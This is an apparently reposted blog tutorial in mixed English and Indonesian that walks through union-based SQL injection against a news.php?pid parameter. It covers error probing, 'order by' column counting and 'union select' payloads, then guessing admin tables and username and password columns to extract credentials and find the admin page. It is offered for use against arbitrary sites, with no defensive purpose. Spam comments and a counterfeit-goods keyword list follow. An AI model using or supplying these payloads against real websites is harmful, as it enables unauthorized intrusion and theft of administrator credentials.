6
Simple Blind SQL Injection Method

.
Simple Blind SQL Injection Methode V4 Tutorial
Langkah Pertama:
Find the target
ex: /news.php?pid=1
Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau
===========
=step two=
===========
find and count to amount the table in database.
use the command : order by
es: [site]/news.php?pid=-1+order+by+1–


chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–
so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–
so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–
============
=step three=
============
for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–
=============
=step four:=
=============
find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users
use command +from+(table_name)–
ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error
and you can see the number is appear for example 2
go to the next step
============
=step five=
============
find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc
last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–
example appear : admin
admin is username
for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc
ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–
example appear : 123456
123456 is password
===============
=step six:=
===============
ok in the last step you must find admin page

Source: Binus Hacker

Bookmark and Share




6 komentar :

Anonim mengatakan... [Reply to comment]

Awesome! Its really amazing post, I have got much clear idea on the topic of from this
post.

My blog; Click on www.garmoshka.su

Anonim mengatakan... [Reply to comment]

Call your local health department to receive
information and support about how to pump and how often to pump your tank.
This oil can also transfer into the transport pipes,
solidify, and cause excessive buildup that can cause blockage of the drainfield.

It should, however, be inspected occasionally to determine the depth of accumulated
sludge and grease.

Here is my web page - go-qual.co.kr ()

Anonim mengatakan... [Reply to comment]

WOW just what I was searching for. Came here by searching for グリーン

My web page: http://bestwoocommercethemes.blogspot.com/2014/05/is-wordpresswoocomerce-combo-good.html

Anonim mengatakan... [Reply to comment]

Continue to, there's a foster carer's online seminar on center the HMRC YouTube channel.
All you'll need to keep a tax file for such items.

Nor is it racial tension, since the summer of 2009 stocks would have a lot
to lose when they default because it causes significant borrowing
difficulties in the future.

My website marketing (http://korea1818.com)

Anonim mengatakan... [Reply to comment]

I do trust all the ideas you've offered in your post. They are really convincing and will definitely work.

Nonetheless, the posts are very brief for
novices. May you please extend them a bit from next time?

Thank you for the post.

Feel free to visit my site browse around this site

chenlina mengatakan... [Reply to comment]

chenlina20150904
michael kors outlet online
air jordans
oakley outlet
nike free run
adidas originals store
coach outlet store online
michael kors outlet online
louis vuitton outlet
nike huaraches
michael kors outlet
kobe bryant shoes
toms outlet
ed hardy outlet
cheap jordans
gucci outlet
michael kors outlet online sale
christian louboutin outlet
nike running shoes
air jordans
louis vuitton outlet
cheap uggs for sale
barbour coats
coach factory outlet
nike store
abercrombie
true religion
jordan 6s
coach outlet store online
michael kors
abercrombie & fitch
oakley store
pandora jewelry
gucci shoes
louis vuitton outlet
ugg boots sale
gucci outlet online
louboutin femme
michael kors outlet online
michael kors outlet online
oakley sunglasses
as

Posting Komentar

Silahkan tinggalkan komentar anda disini...

 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com